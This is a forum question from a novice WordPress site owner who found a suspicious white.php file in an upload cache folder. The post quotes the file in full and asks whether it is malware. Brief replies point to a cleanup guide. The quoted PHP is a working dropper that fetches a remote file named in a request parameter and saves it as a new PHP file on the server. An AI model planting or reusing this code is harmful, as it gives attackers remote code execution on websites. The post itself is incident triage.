# I found this code in white.php file in cache folder on Wordpress website

Tags: wordpress, malware

I found white.php file on my /upload/cache Wordpress folder.
It contains this code:

```
    <?php
$name = '68aa884d96d2e824669d2d.php';
$ch = curl_init ($_REQUEST['68aa884d96d2e824669d2d']);
$fp = fopen ($name, "w+");
curl_setopt ($ch, CURLOPT_FILE, $fp);
$ult = curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
if(!$ult){
$f = file_get_contents($_REQUEST['68aa884d96d2e824669d2d']); 
file_put_contents($name,$f); 
}
```

I'm a noob developer, I would like to know if this is a malware code and, if so, how could I investigate the issue.

Thank you.

Comment: Looks dodgy - try https://sucuri.net/guides/how-to-clean-hacked-wordpress/ - there's a site check site

Comment: Do you also find a file named "68aa884d96d2e824669d2d.php" ?

Comment: No, there wasn't that php file, probably I deleted it cleaning cache folder.